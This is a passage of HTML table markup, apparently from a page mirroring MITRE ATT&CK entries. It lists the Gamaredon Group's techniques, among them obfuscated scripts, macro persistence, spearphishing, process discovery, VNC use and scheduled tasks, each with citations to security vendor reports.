font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> class.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/010"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.010</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/010"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; 
font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command Obfuscation</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used obfuscated or encrypted scripts.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 
8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1137"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1137</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1137"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Office Application Startup</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 
12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has inserted malicious macros into existing documents, providing persistence when they are reopened. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the </span><span style="font-size: 10.5pt; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">/altvba</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> option, once the Application.Startup event is received.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: 
transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1120"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1120</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1120"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Peripheral Device 
Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools have contained an application to check performance of USB flash drives. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also used malware to scan for removable drives.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a 
href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1566"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1566</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1566/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); 
background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1566"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Phishing</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1566/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Spearphishing Attachment</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span 
style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has delivered spearphishing emails with malicious attachments to targets.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; 
font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a><a href="https://www.secureworks.com/research/threat-profiles/iron-tilden"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[7]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1057"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1057</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a 
href="https://attack.mitre.org/techniques/T1057"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Process Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used tools to enumerate processes on target hosts including Process Explorer.</span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: 
baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1021"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1021</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1021/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 
0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1021"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Remote Services</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1021/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">VNC</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.</span><a 
href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a 
href="https://attack.mitre.org/techniques/T1053"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1053</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1053/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1053"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task/Job</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1053/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: 
normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Scheduled Task</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has created scheduled tasks to launch executables after a designated number of minutes have passed.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); 
